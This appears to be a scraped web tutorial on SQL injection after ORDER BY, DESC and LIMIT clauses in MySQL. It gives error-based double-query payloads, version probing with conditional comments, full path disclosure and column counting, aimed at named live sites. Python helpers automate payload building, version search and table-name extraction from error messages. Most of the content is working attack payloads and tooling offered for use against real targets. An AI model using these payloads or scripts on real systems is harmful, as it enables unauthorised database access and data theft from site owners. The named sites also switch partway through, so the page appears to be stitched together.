Bypass 'Incorrect usage of UNION and ORDER BY'

Source: Internet
Author: User

This tutorial gives instructions on how to inject after ORDER BY / LIMIT clauses.

Like this:

PHP Code: SELECT * FROM page WHERE id = 1 ORDER BY id [here] ASC [here] LIMIT 10, 10 [here]
[here] = injection point.
We can't use UNION after those clauses (MySQL rejects it with error 1221, "Incorrect usage of UNION and ORDER BY"), so we are going to play with the other things we can do.

After ORDER BY id [here]
Using the double query.

If we have this site:
Code: http://www.bkjia.com/include/products.php?Sb=id
the injection point is after ORDER BY.

I know I could use UNION in another injection point; I do it this way for the tutorial.
After ORDER BY it is simple; the only things we can't use are
UNION, HAVING, WHERE, and some more things that don't matter.
We can use 'and' to attach the double query. The GROUP BY key is built from the value we want plus FLOOR(RAND(0)*2-1), which returns a fixed repeating sequence, so MySQL runs into a duplicate group key and prints that key, our value included, in the error message.
Code: http://www.teletec.com.pk/include/products.php?Sb=id and (select count(*) from products group by concat(version(),0x27202020,floor(rand(0)*2-1)))--
Result: a duplicate-entry error containing '5.0.95-community'.


(I used the table 'products' because I can see from the error that this table exists. If you can't see a table name, use information_schema.columns.)

After DESC/ASC [here]
Using the double query.

If we have this site:
Code: http://www.teletec.com.pk/include/products.php?Sb=id desc
the injection point is after DESC.

After DESC/ASC it is a little more of a problem, because we can't use
UNION, HAVING, WHERE, AND, OR, XOR, *, >, so we can't append our query to the sort expression.
So we add a comma, which starts a second ORDER BY expression, and put the double query after it.
Code: http://www.teletec.com.pk/include/products.php?Sb=id desc, (select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1)))
Result: '5.0.95-community'


Note: if the injection point is like this
PHP Code: SELECT * FROM page WHERE id = 1 ORDER BY [here] id
just add '1' and inject like the first example:
Code: 1 and (select count(*) from products group by concat(version(),0x27202020,floor(rand(0)*2-1)))--
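The three ORDER BY positions above only differ in how the double query is glued onto the clause, so here is a small added helper (example code written for this page, not the author's tool) that builds the payload for each position, generalizes the leaked expression beyond version() to, for instance, table names from information_schema, and pulls the value back out of the "Duplicate entry" error MySQL prints. The context names, the table_name_expr helper and the sample error string are assumptions constructed for the example.

```python
import re

# 0x27202020 decodes to "'   " (a quote and three spaces); it sits between the
# leaked value and the FLOOR() suffix so the value is easy to spot in the error.
MARKER_HEX = "0x27202020"

def double_query(expr, table="products"):
    """Subquery that makes MySQL raise ERROR 1062 (Duplicate entry) with the value
    of `expr` inside the message. FLOOR(RAND(0)*2-1) yields the fixed sequence
    -1,0,0,-1,... so once `table` has at least three rows GROUP BY meets the same
    key twice and reports it. Same payload shape as on the page."""
    return (f"(select count(*) from {table} group by "
            f"concat({expr},{MARKER_HEX},floor(rand(0)*2-1)))")

def payload(context, expr, table="products"):
    """Wrap the double query for the three ORDER BY positions discussed above.
    Context names are this example's own labels."""
    sub = double_query(expr, table)
    if context == "after_column":       # ORDER BY id [here]
        return f" and {sub}-- "
    if context == "after_direction":    # ORDER BY id DESC [here]: second sort expression
        return f", {sub}"
    if context == "before_column":      # ORDER BY [here] id
        return f"1 and {sub}-- "
    raise ValueError(f"unknown context {context!r}")

def table_name_expr(i):
    """Any single-value expression can replace version(); this one leaks the i-th
    table name of the current database (hypothetical helper, not on the page)."""
    return ("(select table_name from information_schema.tables "
            f"where table_schema=database() limit {i},1)")

# Message shape: Duplicate entry '<value>'   -1' for key 'group_key'
_DUP_RE = re.compile(r"Duplicate entry '(.*)'   (?:-1|0)' for key '")

def leaked_value(error_text):
    """Recover the leaked value from the MySQL error the page displays."""
    m = _DUP_RE.search(error_text)
    return m.group(1) if m else None

if __name__ == "__main__":
    print(payload("after_column", "version()"))
    print(payload("after_direction", table_name_expr(0), table="users"))
    # Constructed sample of the error such a payload produces on a 5.0.95 server.
    sample = "Duplicate entry '5.0.95-community'   -1' for key 'group_key'"
    print(leaked_value(sample))
```

Iterate table_name_expr(0), (1), ... until leaked_value returns None to walk the table list; each request leaks one value.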
After LIMIT 10, 10 [here]
Using some tricks.

Like this site:
Code: http://www.teletec.com.pk/include/products.php?Rw=10
injection point after the LIMIT clause.

When the injection point is after the LIMIT clause we can't do much; only these are accepted there:
OFFSET, INTO, INTO OUTFILE/DUMPFILE, /*! */, FOR UPDATE, LOCK IN SHARE MODE.
So we exploit what we can.
TOC:
Get the version
Full path disclosure
Find the column count

Get the version (thanks to lolalu0)
We can use MySQL version-conditional comments to get the version.
The body of /*!50094 ... */ is executed only when the server version is at least 5.0.94, so garbage inside it breaks the query on such servers and is ignored on older ones. We guess a version, and if the guess is at or below the real version the page does not load, just like blind injection, but different.
Code: http://www.bkjia.com/include/products.php?Rw=10 /*!50094aaaa*/
Page doesn't load: version is 5.0.94 or higher.
Code: http://www.teletec.com.pk/include/products.php?Rw=10 /*!50096aaaa*/
Page loads normally: version is lower than 5.0.96.
Code: http://www.teletec.com.pk/include/products.php?Rw=10 /*!50095aaaa*/
Page doesn't load: version is 5.0.95 or higher, so together with the previous result the version is 5.0.95.
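Because the probe breaks the page exactly when the guessed number is at or below the real version, "page breaks" is monotone in the guess and the three manual guesses above can be replaced by a binary search. The following added example (not the author's code) does that; page_loads is a hypothetical function that sends the injected Rw value and reports whether the page rendered, and FakeTarget is a constructed stand-in that pretends to be the 5.0.95 server so the block runs offline.

```python
import re

def encode(major, minor, release):
    """MySQL conditional-comment version number MMmmrr: 5.0.95 -> 50095."""
    return major * 10000 + minor * 100 + release

def decode(v):
    return v // 10000, (v // 100) % 100, v % 100

def conditional_probe(v):
    """Injected Rw value: the garbage inside /*!vvvvv */ is only parsed,
    and so only breaks the query, when the server version is >= v."""
    return f"10 /*!{v:05d}aaaa*/"

def find_version(page_loads, lo=50000, hi=90000):
    """page_loads(param) -> True if the page rendered with the injected value.
    Finds the largest v in [lo, hi) whose probe breaks the page, i.e. the
    server's version. About 16 requests cover the whole 5.x-8.x range."""
    def breaks(v):
        return not page_loads(conditional_probe(v))
    if not breaks(lo):
        return None                       # older than lo, or comments are filtered
    if breaks(hi):
        raise ValueError("version is at or above hi; raise the upper bound")
    # invariant: breaks(lo) is True and breaks(hi) is False
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if breaks(mid):
            lo = mid
        else:
            hi = mid
    return decode(lo)

class FakeTarget:
    """Constructed stand-in for products.php (assumption: version 5.0.95).
    Replace page_loads with a real HTTP request to use the search for real."""
    def __init__(self, version=50095):
        self.version, self.requests = version, 0

    def page_loads(self, param):
        self.requests += 1
        m = re.search(r"/\*!(\d{5})", param)
        return not (m and int(m.group(1)) <= self.version)

if __name__ == "__main__":
    target = FakeTarget()
    print(find_version(target.page_loads), "in", target.requests, "requests")
```

The search reports None when even the lowest guess does not break the page, which also happens when a WAF strips /*! */ comments, so check that case before trusting a "too old" result.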

FPD
For Full Path Disclosure we can set the LIMIT value to 0 or /**/, and a warning with the full path appears. It is a PHP warning, not a MySQL error, so it shows up regardless of whether mysql_error() output is displayed.
For example:
Code: http://www.teletec.com.pk/include/products.php?Rw=0
Final query:
PHP Code: select * from ... limit 0, 0

We can also do this (the script evidently divides by this parameter, and PHP converts the non-numeric string '/**/1' to 0):
Code: http://www.teletec.com.pk/include/products.php?Rw=/**/1
Warning: Division by zero in /home/teletec/public_html/include/products.php on line 164

Find the column count
Using INTO @.
It doesn't really help, but it's a nice trick.
If we have this site:
Code: http://www.teletec.com.pk/include/products.php?Rw=10
injection point is after LIMIT.
We can count the columns like this. SELECT ... INTO @,@ assigns the selected columns to user variables (here all named @, the empty-named variable). MySQL raises error 1222 when the number of variables does not match the number of columns, and error 1172 when it matches but the query returned more than one row.
Code: http://www.teletec.com.pk/include/products.php?Rw=10 into @

Error 1222.
Not 1 column.

Code: http://www.teletec.com.pk/include/products.php?Rw=10 into @,@

Error 1222.
Not 2 columns.

And so on:
Code: http://www.teletec.com.pk/include/products.php?Rw=10 into @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@

Error 1172 "Result consisted of more than one row".
60 columns.
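Error 1222 does not say whether there are too many or too few variables, so unlike the version probe this has to be a linear scan; it ends at the first count that gets error 1172, or no error at all when the LIMIT happens to return a single row. The following is an added example (not the author's code) that automates the scan; error_code_for is a hypothetical function returning the MySQL error number the page displays (None on success), and FakeTarget is a constructed 60-column stand-in so the block runs offline.

```python
import re

ERR_WRONG_COLUMNS = 1222   # "The used SELECT statements have a different number of columns"
ERR_MULTI_ROW = 1172       # "Result consisted of more than one row"
ERR_PARSE = 1064           # syntax error

def into_probe(n):
    """Injected Rw value: LIMIT 10 INTO @,@,... with n empty-named user variables."""
    return "10 into " + ",".join(["@"] * n)

def count_columns(error_code_for, max_columns=100):
    """error_code_for(param) -> MySQL error number shown by the page, or None
    when the query succeeded. Returns the column count, or None if it exceeds
    max_columns. Any error other than 1222 means the probe did not reach the
    INTO clause as intended, so stop instead of guessing."""
    for n in range(1, max_columns + 1):
        code = error_code_for(into_probe(n))
        if code in (None, ERR_MULTI_ROW):   # variable count matched
            return n
        if code != ERR_WRONG_COLUMNS:
            raise RuntimeError(f"unexpected error {code} at n={n}")
    return None

class FakeTarget:
    """Constructed stand-in for products.php (assumption: 60 columns, LIMIT
    returns 10 rows). Replace error_code_for with a request that parses the
    error number out of the page to use this for real."""
    def __init__(self, columns=60, rows=10):
        self.columns, self.rows = columns, rows

    def error_code_for(self, param):
        m = re.search(r"into ((?:@,)*@)$", param)
        if not m:
            return ERR_PARSE
        n = m.group(1).count("@")
        if n != self.columns:
            return ERR_WRONG_COLUMNS
        return ERR_MULTI_ROW if self.rows > 1 else None

if __name__ == "__main__":
    print(count_columns(FakeTarget().error_code_for))
```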

Hope you learned something

Author: just fuck it!
